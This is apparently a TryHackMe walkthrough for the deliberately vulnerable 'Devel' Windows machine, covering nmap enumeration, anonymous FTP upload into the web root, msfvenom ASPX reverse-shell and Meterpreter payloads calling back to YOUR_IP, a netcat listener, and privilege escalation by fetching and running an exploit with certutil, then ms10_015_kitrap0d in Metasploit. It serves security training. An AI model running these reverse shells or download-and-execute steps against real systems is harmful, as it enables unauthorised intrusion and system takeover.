TryHackMe Devel Walkthrough – Manual and Metasploit Methods#

Devel is a beginner-friendly vulnerable machine that highlights risks caused by default configurations. It can be exploited using publicly available tools and basic enumeration.

Nmap Scan#

We begin with a basic nmap scan to discover open ports and services:

1
nmap -sC -sV -p- MACHINE_IP

command

From the results, we find two key open ports:

21 (FTP) – with anonymous login enabled
80 (HTTP) – hosting a web server

nmap_scan

Step 1: Confirming FTP-HTTP Link#

Visit the website on port 80 – a welcome image (welcome.png) is displayed.

saving image

We notice that this file also appears in the FTP directory. This suggests the web server pulls files directly from the FTP root.

image_name

To confirm, upload a file (test.txt) using anonymous FTP, then access it via the browser:

1
ftp MACHINE_IP
2
put test.txt

sending _ftp Traversing

Step 2: Web Tech Detection#

Using Wappalyzer or similar tools, we identify the site runs Microsoft ASP.NET.

wappalyzer

After quick research, we confirm .aspx is the extension in use:

google_search

Method 1: Manual Exploitation (Netcat)#

Generate a reverse shell payload using msfvenom:

1
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 -f aspx > rev.aspx

msfvenom_payload

Upload the payload via FTP:

1
ftp MACHINE_IP
2
put rev.aspx

sending_payload

Start a listener:

1
nc -lvnp 4444

netcat_listening

Execute the payload via browser:

1
http://MACHINE_IP/rev.aspx

rev.aspx

We receive a shell as a low-privileged user:

low_level_user

Privilege Escalation (Manual)#

Run systeminfo to gather system details:

1
systeminfo

systeminfo

Search for known exploits using OS version info:

Search: Windows 7 Enterprise build 7600 x86 exploit

exploit

Download with searchsploit, serve via Python:

1
searchsploit -m exploit/windows/local/XXXXXXXX
2
python3 -m http.server 80

searchsploit Python_sever

Download and run from victim using certutil:

1
certutil -urlcache -f http://YOUR_IP/exploit.exe exploit.exe
2
exploit.exe

downlaod_exploit

Flags#

Flag 1: Flag:1

Flag 2: Flag:2

Method 2: Automated Exploitation (Metasploit)#

Generate a Meterpreter payload:

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4444 -f aspx > shell.aspx

payload_creation

Upload it to the server via FTP:

sending_payload

Set up Metasploit multi/handler:

1
use exploit/multi/handler
2
set PAYLOAD windows/meterpreter/reverse_tcp
3
set LHOST YOUR_IP
4
set LPORT 4444
5
run

exploit_setting

Trigger the shell:

1
http://MACHINE_IP/shell.aspx

reverse_shell

Get Meterpreter access:

get_shell

Run post-exploitation module:

1
use post/multi/recon/local_exploit_suggester
2
set SESSION 1
3
run

exploit_suggestor

Exploit with ms10_015_kitrap0d:

exploit_setting

Final Flags#

Flag 1: Flag:1

Flag 2: Flag:2

Conclusion#

Devel demonstrates the risk of misconfigured services (FTP, ASP.NET) and how attackers can exploit them with simple privilege escalation techniques. Both manual and Metasploit methods highlight the same vulnerabilities but with different workflows.